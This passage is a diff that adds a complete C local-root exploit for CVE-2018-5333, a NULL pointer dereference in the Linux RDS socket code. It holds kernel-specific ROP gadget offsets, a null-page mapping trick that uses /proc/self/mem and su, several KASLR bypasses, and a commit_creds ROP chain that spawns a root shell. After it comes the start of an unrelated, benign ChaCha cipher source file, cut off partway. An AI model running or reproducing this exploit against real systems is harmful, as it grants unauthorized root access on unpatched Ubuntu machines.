+  { "4.4.0-38-lowlatency #57-Ubuntu",   0xa3500, 0xa3910, 0x5e0c5, 0x17bcb7, 0x409b38, 0x64d24, 0x4c030 },
+  { "4.4.0-42-lowlatency #62-Ubuntu",   0xa3560, 0xa3970, 0x5e0c5, 0x17bcf7, 0x409f68, 0x64d24, 0x7db6c },
+  { "4.4.0-98-lowlatency #121-Ubuntu",  0xa38c0, 0xa3cd0, 0x5e0c5, 0x17d737, 0x413408, 0x64d84, 0x24454 },
+  { "4.4.0-109-lowlatency #132-Ubuntu", 0xa5530, 0xa5940, 0x5f0c5, 0x17f257, 0x414c18, 0x65d94, 0x7f7ac },
+  { "4.4.0-112-lowlatency #135-Ubuntu", 0xa5bd0, 0xa5fe0, 0x5f0c5, 0x17f9a7, 0x415448, 0x65d94, 0x7f8dc },
+  { "4.4.0-116-lowlatency #140-Ubuntu", 0xa6e00, 0xa7210, 0x600c5, 0x1818f7, 0x418a38, 0x66de4, 0x809ef },
+
+  { "4.8.0-34-generic #36~16.04.1-Ubuntu", 0xa5d50, 0xa6140, 0x5d0c5, 0x1876d7, 0x43d208, 0x642f4, 0x7ed2b },
+  { "4.8.0-36-generic #36~16.04.1-Ubuntu", 0xa5d50, 0xa6140, 0x5d0c5, 0x1876d7, 0x43d208, 0x642f4, 0x7ed2b },
+  { "4.8.0-39-generic #42~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43da98, 0x642f4, 0x7ed2b },
+  { "4.8.0-41-generic #44~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43da98, 0x642f4, 0x7ed2b },
+  { "4.8.0-42-generic #45~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dea8, 0x642f4, 0x5c4f3 },
+  { "4.8.0-44-generic #47~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dac8, 0x642f4, 0x7ed2b },
+  { "4.8.0-45-generic #48~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dac8, 0x642f4, 0x7ed2b },
+  { "4.8.0-46-generic #49~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dac8, 0x642f4, 0x7ed2b },
+  { "4.8.0-49-generic #52~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43dce8, 0x642f4, 0x7ed3b },
+  { "4.8.0-51-generic #54~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43dce8, 0x642f4, 0x7ed3b },
+  { "4.8.0-52-generic #55~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e208, 0x642f4, 0x7ed3b },
+  { "4.8.0-53-generic #56~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e208, 0x642f4, 0x7ed3b },
+  { "4.8.0-54-generic #57~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e208, 0x642f4, 0x7ed3b },
+  //{ "4.8.0-56-generic #61~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e278, 0x642f4, 0x7ed3b },
+  //{ "4.8.0-58-generic #63~16.04.1-Ubuntu", 0xa5d20, 0xa6110, 0x5d0c5, 0x187797, 0x43dfa8, 0x642f4, 0x7ed5b },
+
+  { "4.8.0-34-lowlatency #36~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18ae07, 0x4467f8, 0x649f4, 0x7f902 },
+  { "4.8.0-36-lowlatency #36~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18ae07, 0x4467f8, 0x649f4, 0x7f902 },
+  //{ "4.8.0-39-lowlatency #42~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aec7, 0x4470d8, 0x649f4, 0x7f902 },
+  { "4.8.0-41-lowlatency #44~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aec7, 0x4470d8, 0x649f4, 0x7f902 },
+  { "4.8.0-42-lowlatency #45~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aeb7, 0x447428, 0x649f4, 0x4b3e3 },
+  { "4.8.0-44-lowlatency #47~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aeb7, 0x447108, 0x649f4, 0x4b3e3 },
+  { "4.8.0-45-lowlatency #48~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aeb7, 0x447108, 0x649f4, 0x4b3e3 },
+  { "4.8.0-46-lowlatency #49~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aeb7, 0x447108, 0x649f4, 0x4b3e3 },
+  { "4.8.0-49-lowlatency #52~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x447278, 0x649f4, 0x4b3e3 },
+  { "4.8.0-51-lowlatency #54~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x447278, 0x649f4, 0x4b3e3 },
+  { "4.8.0-52-lowlatency #55~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477a8, 0x649f4, 0x4b3e3 },
+  { "4.8.0-53-lowlatency #56~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477a8, 0x649f4, 0x4b3e3 },
+  { "4.8.0-54-lowlatency #57~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477a8, 0x649f4, 0x7f912 },
+  //{ "4.8.0-56-lowlatency #61~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477f8, 0x649f4, 0x7f912 },
+  //{ "4.8.0-58-lowlatency #63~16.04.1-Ubuntu", 0xa6ef0, 0xa7300, 0x5e0c5, 0x18aee7, 0x447568, 0x649f4, 0x7f932 },
+
+  //{ "4.10.0-14-generic #16~16.04.1-Ubuntu", 0xab610, 0xaba00, 0x600c5, 0x194ac7, 0x458288, 0x67764, 0x34c4b },
+  //{ "4.13.0-16-generic #19~16.04.3-Ubuntu", 0xa8220, 0xa85f0, 0x5f0c5, 0x19c8a7, 0x462d18, 0x668b4, 0x2f2d4 },
+  //{ "4.13.0-37-generic #42~16.04.1-Ubuntu", 0xab1d0, 0xab5a0, 0x610c5, 0x1a0827, 0x46bf58, 0x68944, 0x3381b },
+};
+
+// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *
+// https://github.com/0x36/CVE-pocs/blob/master/CVE-2018-5333-rds-nullderef.c
+
+#define RAND_SIZE 4096
+
+#ifndef SOL_RDS
+#  define SOL_RDS 276
+#endif
+#ifndef RDS_CMSG_MASKED_ATOMIC_CSWP
+#  define RDS_CMSG_MASKED_ATOMIC_CSWP 9
+#endif
+#ifndef AF_RDS
+#  define AF_RDS 0x15
+#endif
+
+void trigger_bug()
+{
+  struct sockaddr_in sin;
+  struct msghdr msg;
+  char buf[RAND_SIZE];
+  struct cmsghdr cmsg;
+
+  memset(&sin, 0, sizeof(struct sockaddr));
+  memset(&msg, 0, sizeof(msg));
+  memset(buf, 0x40, sizeof(buf));
+  memset(&cmsg, 0, sizeof(cmsg));
+
+  int fd = socket(AF_RDS, 5, 0);
+  if(fd < 0) {
+    dprintf("[-] socket(AF_RDS): %m\n");
+    return;
+  }
+
+  sin.sin_family = AF_INET;
+  sin.sin_port = htons(2000);
+  sin.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
+
+  bind(fd, (struct sockaddr*)&sin, sizeof(sin));
+
+  cmsg.cmsg_len = RAND_SIZE;
+  cmsg.cmsg_type = RDS_CMSG_MASKED_ATOMIC_CSWP;
+  cmsg.cmsg_level = SOL_RDS;
+
+  memcpy(&buf[0], &cmsg, sizeof(cmsg));
+
+  *(uint64_t *)(buf + 0x18) = 0x40404000; /* args->local_addr */
+
+  msg.msg_name = &sin;
+  msg.msg_namelen = sizeof(sin);
+  msg.msg_iov = NULL;
+  msg.msg_iovlen = 0;
+  msg.msg_control = buf;
+  msg.msg_controllen = RAND_SIZE;
+  msg.msg_flags = MSG_DONTROUTE|MSG_PROXY|MSG_WAITALL;
+
+  sendmsg(fd, &msg, 0);
+}
+
+// * * * * * * * * * * * * * * map null address * * * * * * * * * * * * *
+// https://bugs.chromium.org/p/project-zero/issues/detail?id=1792&desc=2
+
+void map_null() {
+  void *map = mmap((void *)0x10000, 0x1000, PROT_READ | PROT_WRITE,
+    MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN | MAP_FIXED, -1, 0);
+
+  if (map == MAP_FAILED) {
+    dprintf("[-] mmap(null): %m\n");
+    exit(EXIT_FAILURE);
+  }
+
+  char* path = "/proc/self/mem";
+  int fd = open(path, O_RDWR);
+
+  if (fd == -1) {
+    dprintf("open(%s): %m\n", path);
+    exit(EXIT_FAILURE);
+  }
+
+  unsigned long addr = (unsigned long)map;
+
+  while (addr != 0) {
+    addr -= 0x1000;
+    if (lseek(fd, addr, SEEK_SET) == -1) {
+      dprintf("lseek()\n");
+      exit(EXIT_FAILURE);
+    }
+    char cmd[1000];
+    sprintf(cmd, "LD_DEBUG=help su 1>&%d", fd);
+    system(cmd);
+  }
+}
+
+// * * * * * * * * * * * * * * * save state * * * * * * * * * * * * * * *
+// https://github.com/vnik5287/kernel_rop
+
+unsigned long user_cs, user_ss, user_rflags;
+
+static void save_state() {
+  asm(
+  "movq %%cs, %0\n"
+  "movq %%ss, %1\n"
+  "pushfq\n"
+  "popq %2\n"
+  : "=r" (user_cs), "=r" (user_ss), "=r" (user_rflags) : : "memory");
+}
+
+// * * * * * * * * * * * * * * SIGSEGV handler * * * * * * * * * * * * * *
+
+void handler(int signo, siginfo_t* info, void* vcontext) {}
+
+void debug_enable_sigsev_handler() {
+  struct sigaction action;
+  memset(&action, 0, sizeof(struct sigaction));
+  action.sa_flags = SA_SIGINFO;
+  action.sa_sigaction = handler;
+  sigaction(SIGSEGV, &action, NULL);
+}
+
+// * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * *
+
+#define CHUNK_SIZE 1024
+
+int read_file(const char* file, char* buffer, int max_length) {
+  int f = open(file, O_RDONLY);
+  if (f == -1)
+    return -1;
+  int bytes_read = 0;
+  while (1) {
+    int bytes_to_read = CHUNK_SIZE;
+    if (bytes_to_read > max_length - bytes_read)
+      bytes_to_read = max_length - bytes_read;
+    int rv = read(f, &buffer[bytes_read], bytes_to_read);
+    if (rv == -1)
+      return -1;
+    bytes_read += rv;
+    if (rv == 0)
+      return bytes_read;
+  }
+}
+
+#define PROC_CPUINFO_LENGTH 4096
+
+static int check_env() {
+  int fd = socket(AF_RDS, 5, 0);
+  if(fd < 0) {
+    dprintf("[-] socket(AF_RDS): RDS kernel module not loaded?\n");
+    exit(EXIT_FAILURE);
+  }
+
+  char buffer[PROC_CPUINFO_LENGTH];
+  char* path = "/proc/cpuinfo";
+  int length = read_file(path, &buffer[0], PROC_CPUINFO_LENGTH);
+  if (length == -1) {
+    dprintf("[-] open/read(%s): %m\n", path);
+    exit(EXIT_FAILURE);
+  }
+
+  char* found = memmem(&buffer[0], length, "smap", 4);
+  if (found != NULL) {
+    dprintf("[-] SMAP detected, no bypass available\n");
+    exit(EXIT_FAILURE);
+  }
+
+  struct stat st;
+
+  if (stat("/dev/grsec", &st) == 0) {
+    dprintf("[!] Warning: grsec is in use\n");
+  }
+
+  if (stat("/proc/sys/lkrg", &st) == 0) {
+    dprintf("[!] Warning: lkrg is in use\n");
+  }
+
+  return 0;
+}
+
+struct utsname get_kernel_version() {
+  struct utsname u;
+  int rv = uname(&u);
+  if (rv != 0) {
+    dprintf("[-] uname()\n");
+    exit(EXIT_FAILURE);
+  }
+  return u;
+}
+
+#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))
+#define KERNEL_VERSION_SIZE_BUFFER 512
+
+void detect_versions() {
+  struct utsname u;
+  char kernel_version[KERNEL_VERSION_SIZE_BUFFER];
+
+  u = get_kernel_version();
+
+  if (strstr(u.machine, "64") == NULL) {
+    dprintf("[-] system is not using a 64-bit kernel\n");
+    exit(EXIT_FAILURE);
+  }
+
+  if (strstr(u.version, "-Ubuntu") == NULL) {
+    dprintf("[-] system is not using an Ubuntu kernel\n");
+    exit(EXIT_FAILURE);
+  }
+
+  char *u_ver = strtok(u.version, " ");
+  snprintf(kernel_version, KERNEL_VERSION_SIZE_BUFFER, "%s %s", u.release, u_ver);
+
+  int i;
+  for (i = 0; i < ARRAY_SIZE(kernels); i++) {
+    if (strcmp(kernel_version, kernels[i].kernel_version) == 0) {
+      dprintf("[.] kernel version '%s' detected\n", kernels[i].kernel_version);
+      kernel = i;
+      return;
+    }
+  }
+
+  dprintf("[-] kernel version '%s' not recognized\n", kernel_version);
+  exit(EXIT_FAILURE);
+}
+
+// * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *
+// https://grsecurity.net/~spender/exploits/exploit.txt
+
+#if ENABLE_KASLR_BYPASS_KALLSYMS
+unsigned long get_kernel_addr_kallsyms() {
+  FILE *f;
+  unsigned long addr = 0;
+  char dummy;
+  char sname[256];
+  char* name = "startup_64";
+  char* path = "/proc/kallsyms";
+
+  dprintf("[.] trying %s...\n", path);
+  f = fopen(path, "r");
+  if (f == NULL) {
+      dprintf("[-] open/read(%s): %m\n", path);
+      return 0;
+  }
+
+  int ret = 0;
+  while (ret != EOF) {
+    ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
+    if (ret == 0) {
+      fscanf(f, "%s\n", sname);
+      continue;
+    }
+    if (!strcmp(name, sname)) {
+      fclose(f);
+      if (addr == 0)
+        dprintf("[-] kernel base not found in %s\n", path);
+      return addr;
+    }
+  }
+
+  fclose(f);
+  dprintf("[-] kernel base not found in %s\n", path);
+  return 0;
+}
+#endif
+
+// * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *
+// https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c
+
+#if ENABLE_KASLR_BYPASS_SYSLOG
+#define SYSLOG_ACTION_READ_ALL 3
+#define SYSLOG_ACTION_SIZE_BUFFER 10
+
+int mmap_syslog(char** buffer, int* size) {
+  *size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);
+  if (*size == -1) {
+    dprintf("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER): %m\n");
+    return 1;
+  }
+
+  *size = (*size / getpagesize() + 1) * getpagesize();
+  *buffer = (char*)mmap(NULL, *size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+
+  *size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);
+  if (*size == -1) {
+    dprintf("[-] klogctl(SYSLOG_ACTION_READ_ALL): %m\n");
+    return 1;
+  }
+
+  return 0;
+}
+
+unsigned long get_kernel_addr_syslog_xenial(char* buffer, int size) {
+  const char* needle1 = "Freeing unused";
+  char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
+  if (substr == NULL)
+    return 0;
+
+  int start = 0;
+  int end = 0;
+  for (start = 0; substr[start] != '-'; start++);
+  for (end = start; substr[end] != '\n'; end++);
+
+  const char* needle2 = "ffffff";
+  substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
+
+  if (substr == NULL)
+    return 0;
+
+  char* endptr = &substr[16];
+  unsigned long addr = strtoul(&substr[0], &endptr, 16);
+
+  addr &= 0xfffffffffff00000ul;
+  addr -= 0x1000000ul;
+
+  if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
+    return addr;
+
+  return 0;
+}
+
+unsigned long get_kernel_addr_syslog() {
+  unsigned long addr = 0;
+  char* syslog;
+  int size;
+
+  dprintf("[.] trying syslog...\n");
+
+  if (mmap_syslog(&syslog, &size))
+    return 0;
+
+  addr = get_kernel_addr_syslog_xenial(syslog, size);
+
+  if (!addr)
+    dprintf("[-] kernel base not found in syslog\n");
+
+  return addr;
+}
+#endif
+
+// * * * * * * * * * * * perf_event_open KASLR bypass * * * * * * * * * * *
+// https://blog.lizzie.io/kaslr-and-perf.html
+
+#if ENABLE_KASLR_BYPASS_PERF
+int perf_event_open(struct perf_event_attr *attr, pid_t pid, int cpu, int group_fd, unsigned long flags)
+{
+  return syscall(SYS_perf_event_open, attr, pid, cpu, group_fd, flags);
+}
+
+unsigned long get_kernel_addr_perf() {
+  int fd;
+  pid_t child;
+
+  dprintf("[.] trying perf_event_open sampling...\n");
+
+  child = fork();
+
+  if (child == -1) {
+    dprintf("[-] fork() failed: %m\n");
+    return 0;
+  }
+
+  if (child == 0) {
+    struct utsname self = {0};
+    while (1) uname(&self);
+    return 0;
+  }
+
+  struct perf_event_attr event = {
+    .type = PERF_TYPE_SOFTWARE,
+    .config = PERF_COUNT_SW_TASK_CLOCK,
+    .size = sizeof(struct perf_event_attr),
+    .disabled = 1,
+    .exclude_user = 1,
+    .exclude_hv = 1,
+    .sample_type = PERF_SAMPLE_IP,
+    .sample_period = 10,
+    .precise_ip = 1
+  };
+
+  fd = perf_event_open(&event, child, -1, -1, 0);
+
+  if (fd < 0) {
+    dprintf("[-] syscall(SYS_perf_event_open): %m\n");
+    if (child) kill(child, SIGKILL);
+    if (fd > 0) close(fd);
+    return 0;
+  }
+
+  uint64_t page_size = getpagesize();
+  struct perf_event_mmap_page *meta_page = NULL;
+  meta_page = mmap(NULL, (page_size * 2), PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
+
+  if (meta_page == MAP_FAILED) {
+    dprintf("[-] mmap() failed: %m\n");
+    if (child) kill(child, SIGKILL);
+    if (fd > 0) close(fd);
+    return 0;
+  }
+
+  if (ioctl(fd, PERF_EVENT_IOC_ENABLE)) {
+    dprintf("[-] ioctl failed: %m\n");
+    if (child) kill(child, SIGKILL);
+    if (fd > 0) close(fd);
+    return 0;
+  }
+  char *data_page = ((char *) meta_page) + page_size;
+
+  size_t progress = 0;
+  uint64_t last_head = 0;
+  size_t num_samples = 0;
+  unsigned long min_addr = ~0;
+  while (num_samples < 100) {
+    /* is reading from the meta_page racy? no idea */
+    while (meta_page->data_head == last_head);;
+    last_head = meta_page->data_head;
+
+    while (progress < last_head) {
+      struct __attribute__((packed)) sample {
+        struct perf_event_header header;
+        uint64_t ip;
+      } *here = (struct sample *) (data_page + progress % page_size);
+      switch (here->header.type) {
+      case PERF_RECORD_SAMPLE:
+        num_samples++;
+        if (here->header.size < sizeof(*here)) {
+          dprintf("[-] size too small.\n");
+          if (child) kill(child, SIGKILL);
+          if (fd > 0) close(fd);
+          return 0;
+        }
+
+        uint64_t prefix;
+        if (strstr(kernels[kernel].kernel_version, "4.8.0-")) {
+          prefix = here->ip & ~0xfffff;
+        } else {
+          prefix = here->ip & ~0xffffff;
+        }
+
+        if (prefix < min_addr) min_addr = prefix;
+        break;
+      case PERF_RECORD_THROTTLE:
+      case PERF_RECORD_UNTHROTTLE:
+      case PERF_RECORD_LOST:
+        break;
+      default:
+        dprintf("[-] unexpected perf event: %x\n", here->header.type);
+        if (child) kill(child, SIGKILL);
+              if (fd > 0) close(fd);
+        return 0;
+      }
+      progress += here->header.size;
+    }
+    /* tell the kernel we read it. */
+    meta_page->data_tail = last_head;
+  }
+
+  if (child) kill(child, SIGKILL);
+  if (fd > 0) close(fd);
+  return min_addr;
+}
+#endif
+
+// * * * * * * * * * * * * * * mincore KASLR bypass * * * * * * * * * * * * * *
+// https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
+
+#if ENABLE_KASLR_BYPASS_MINCORE
+unsigned long get_kernel_addr_mincore() {
+  unsigned char buf[getpagesize() / sizeof(unsigned char)];
+  unsigned long iterations = 20000000;
+  unsigned long addr = 0;
+
+  dprintf("[.] trying mincore info leak...\n");
+
+  if (strstr(kernels[kernel].kernel_version, "4.8.0-")) {
+    dprintf("[-] target kernel does not permit mincore info leak\n");
+    return 0;
+  }
+
+  /* A MAP_ANONYMOUS | MAP_HUGETLB mapping */
+  if (mmap((void*)0x66000000, 0x20000000000,
+       PROT_NONE, MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED) {
+    dprintf("[-] mmap(): %m\n");
+    return 0;
+  }
+
+  int i;
+  for (i = 0; i <= iterations; i++) {
+    /* Touch a mishandle with this type mapping */
+    if (mincore((void*)0x86000000, 0x1000000, buf)) {
+      dprintf("[-] mincore(): %m\n");
+      return 0;
+    }
+
+    int n;
+    for (n = 0; n < getpagesize() / sizeof(unsigned char); n++) {
+      addr = *(unsigned long*)(&buf[n]);
+      /* Kernel address space */
+      if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX) {
+        addr &= 0xffffffffff000000ul;
+        if (munmap((void*)0x66000000, 0x20000000000))
+          dprintf("[-] munmap(): %m\n");
+        return addr;
+      }
+    }
+  }
+
+  if (munmap((void*)0x66000000, 0x20000000000))
+    dprintf("[-] munmap(): %m\n");
+
+  dprintf("[-] kernel base not found in mincore info leak\n");
+  return 0;
+}
+#endif
+
+// * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * *
+
+unsigned long get_kernel_addr() {
+  unsigned long addr = 0;
+
+#if ENABLE_KASLR_BYPASS_KALLSYMS
+  addr = get_kernel_addr_kallsyms();
+  if (addr) return addr;
+#endif
+
+#if ENABLE_KASLR_BYPASS_SYSLOG
+  addr = get_kernel_addr_syslog();
+  if (addr) return addr;
+#endif
+
+#if ENABLE_KASLR_BYPASS_PERF
+  addr = get_kernel_addr_perf();
+  if (addr) return addr;
+#endif
+
+#if ENABLE_KASLR_BYPASS_MINCORE
+  addr = get_kernel_addr_mincore();
+  if (addr) return addr;
+#endif
+
+  dprintf("[-] KASLR bypass failed, kernel base not found\n");
+  exit(EXIT_FAILURE);
+
+  return 0;
+}
+
+// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *
+
+static void shell() {
+  if (getuid() == 0 && geteuid() == 0) {
+    dprintf("[+] got root\n");
+    system(SHELL);
+  } else {
+    dprintf("[-] failed\n");
+  }
+  exit(EXIT_FAILURE);
+}
+
+void fork_shell() {
+  pid_t rv;
+
+  rv = fork();
+  if (rv == -1) {
+    dprintf("[-] fork(): %m\n");
+    exit(EXIT_FAILURE);
+  }
+
+  if (rv == 0)
+    shell();
+}
+
+int main(int argc, char *argv[]) {
+  if (argc > 1) SHELL = argv[1];
+  dprintf("Linux RDS rds_atomic_free_op NULL pointer dereference local root (CVE-2018-5333)\n");
+
+  dprintf("[.] checking kernel version...\n");
+  detect_versions();
+  dprintf("[~] done, version looks good\n");
+
+#if ENABLE_SYSTEM_CHECKS
+  dprintf("[.] checking system...\n");
+  check_env();
+  dprintf("[~] done, looks good\n");
+#endif
+
+  dprintf("[.] mapping null address...\n");
+  map_null();
+  dprintf("[~] done, mapped null address\n");
+
+#if ENABLE_KASLR_BYPASS
+  dprintf("[.] KASLR bypass enabled, getting kernel base address\n");
+  KERNEL_BASE = get_kernel_addr();
+  dprintf("[.] done, kernel text:   %lx\n", KERNEL_BASE);
+#endif
+
+  unsigned long commit_creds =        (KERNEL_BASE + kernels[kernel].commit_creds);
+  unsigned long prepare_kernel_cred = (KERNEL_BASE + kernels[kernel].prepare_kernel_cred);
+  unsigned long xor_rdi =             (KERNEL_BASE + kernels[kernel].xor_rdi);
+  unsigned long mov_rdi_rax =         (KERNEL_BASE + kernels[kernel].mov_rdi_rax);
+  unsigned long xchg_esp =            (KERNEL_BASE + kernels[kernel].xchg_esp);
+  unsigned long swapgs =              (KERNEL_BASE + kernels[kernel].swapgs);
+  unsigned long iretq =               (KERNEL_BASE + kernels[kernel].iretq);
+
+  dprintf("[.] commit_creds:        %lx\n", commit_creds);
+  dprintf("[.] prepare_kernel_cred: %lx\n", prepare_kernel_cred);
+
+  dprintf("[.] mmapping fake stack...\n");
+
+  uint64_t page_size = getpagesize();
+  uint64_t stack_aligned = (xchg_esp & 0x00000000fffffffful) & ~(page_size - 1);
+  uint64_t stack_offset = xchg_esp % page_size;
+
+  unsigned long *fake_stack = mmap((void*)stack_aligned, 0x200000,
+    PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN | MAP_FIXED, -1, 0);
+
+  if (fake_stack == MAP_FAILED) {
+    dprintf("[-] mmap(fake_stack): %m\n");
+    exit(EXIT_FAILURE);
+  }
+
+  unsigned long *temp_stack = mmap((void*)0x30000000, 0x10000000,
+    PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN | MAP_FIXED, -1, 0);
+
+  if (temp_stack == MAP_FAILED) {
+    dprintf("[-] mmap(temp_stack): %m\n");
+    exit(EXIT_FAILURE);
+  }
+
+  static unsigned long result = 0;
+  unsigned long *data = (unsigned long *)0;
+  data[1] = (uint64_t)&result;
+  data[3] = xchg_esp;
+
+  save_state();
+  debug_enable_sigsev_handler();
+
+  fake_stack = (unsigned long *)(stack_aligned + stack_offset);
+
+  int i = 0;
+
+  fake_stack[i++] = xor_rdi;
+  fake_stack[i++] = prepare_kernel_cred;
+  fake_stack[i++] = mov_rdi_rax;
+  fake_stack[i++] = 0x12345678;
+  fake_stack[i++] = 0x12345678;
+  fake_stack[i++] = 0x12345678;
+  fake_stack[i++] = commit_creds;
+
+  fake_stack[i++] = swapgs;
+  fake_stack[i++] = 0x12345678;
+
+  fake_stack[i++] = iretq;
+  fake_stack[i++] = (unsigned long)shell;
+  fake_stack[i++] = user_cs;
+  fake_stack[i++] = user_rflags;
+  fake_stack[i++] = (unsigned long)(temp_stack + 0x500000);
+  fake_stack[i++] = user_ss;
+
+  dprintf("[~] done, fake stack mmapped\n");
+
+  dprintf("[.] executing payload %p...\n", (void*)&shell);
+  trigger_bug();
+
+  return 0;
+}
+
@@ -0,0 +1,224 @@
+/*
+chacha-merged.c version 20080118
+D. J. Bernstein
+Public domain.
+*/
+
+/* $OpenBSD: chacha_private.h,v 1.2 2013/10/04 07:02:27 djm Exp $ */
+
+#include <stddef.h>
+
+typedef unsigned char u8;
+typedef unsigned int u32;
+
+typedef struct
+{
+  u32 input[16]; /* could be compressed */
+} chacha_ctx;
+
+#define U8C(v) (v##U)
+#define U32C(v) (v##U)
+
+#define U8V(v) ((u8)(v) & U8C(0xFF))
+#define U32V(v) ((u32)(v) & U32C(0xFFFFFFFF))
+
+#define ROTL32(v, n) \
+  (U32V((v) << (n)) | ((v) >> (32 - (n))))
+
+#define U8TO32_LITTLE(p) \
+  (((u32)((p)[0])      ) | \
+   ((u32)((p)[1]) <<  8) | \
+   ((u32)((p)[2]) << 16) | \
+   ((u32)((p)[3]) << 24))
+
+#define U32TO8_LITTLE(p, v) \
+  do { \
+    (p)[0] = U8V((v)      ); \
+    (p)[1] = U8V((v) >>  8); \
+    (p)[2] = U8V((v) >> 16); \
+    (p)[3] = U8V((v) >> 24); \
+  } while (0)
+
+#define ROTATE(v,c) (ROTL32(v,c))
+#define XOR(v,w) ((v) ^ (w))
+#define PLUS(v,w) (U32V((v) + (w)))
+#define PLUSONE(v) (PLUS((v),1))
+
+#define QUARTERROUND(a,b,c,d) \
+  a = PLUS(a,b); d = ROTATE(XOR(d,a),16); \
+  c = PLUS(c,d); b = ROTATE(XOR(b,c),12); \
+  a = PLUS(a,b); d = ROTATE(XOR(d,a), 8); \
+  c = PLUS(c,d); b = ROTATE(XOR(b,c), 7);
+
+static const char sigma[16] = "expand 32-byte k";
+static const char tau[16] = "expand 16-byte k";
+
+static void
+chacha_keysetup(chacha_ctx *x,const u8 *k,u32 kbits,u32 ivbits)
+{
+  const char *constants;
+
+  x->input[4] = U8TO32_LITTLE(k + 0);
+  x->input[5] = U8TO32_LITTLE(k + 4);
+  x->input[6] = U8TO32_LITTLE(k + 8);
+  x->input[7] = U8TO32_LITTLE(k + 12);
+  if (kbits == 256) { /* recommended */
+    k += 16;
+    constants = sigma;
+  } else { /* kbits == 128 */
+    constants = tau;
+  }
+  x->input[8] = U8TO32_LITTLE(k + 0);
+  x->input[9] = U8TO32_LITTLE(k + 4);
+  x->input[10] = U8TO32_LITTLE(k + 8);
+  x->input[11] = U8TO32_LITTLE(k + 12);
+  x->input[0] = U8TO32_LITTLE(constants + 0);
+  x->input[1] = U8TO32_LITTLE(constants + 4);
+  x->input[2] = U8TO32_LITTLE(constants + 8);
+  x->input[3] = U8TO32_LITTLE(constants + 12);
+}
+
+static void
+chacha_ivsetup(chacha_ctx *x,const u8 *iv)
+{
+  x->input[12] = 1;
+  x->input[13] = U8TO32_LITTLE(iv + 0);
+  x->input[14] = U8TO32_LITTLE(iv + 4);
+  x->input[15] = U8TO32_LITTLE(iv + 8);
+}
+
+static void
+chacha_encrypt_bytes(chacha_ctx *x,const u8 *m,u8 *c,u32 bytes)
+{
+  u32 x0, x1, x2, x3, x4, x5, x6, x7, x8, x9, x10, x11, x12, x13, x14, x15;
+  u32 j0, j1, j2, j3, j4, j5, j6, j7, j8, j9, j10, j11, j12, j13, j14, j15;
+  u8 *ctarget = NULL;
+  u8 tmp[64];
+  u32 i;
+
+  if (!bytes) return;
+
+  j0 = x->input[0];
+  j1 = x->input[1];
+  j2 = x->input[2];
+  j3 = x->input[3];
+  j4 = x->input[4];
+  j5 = x->input[5];
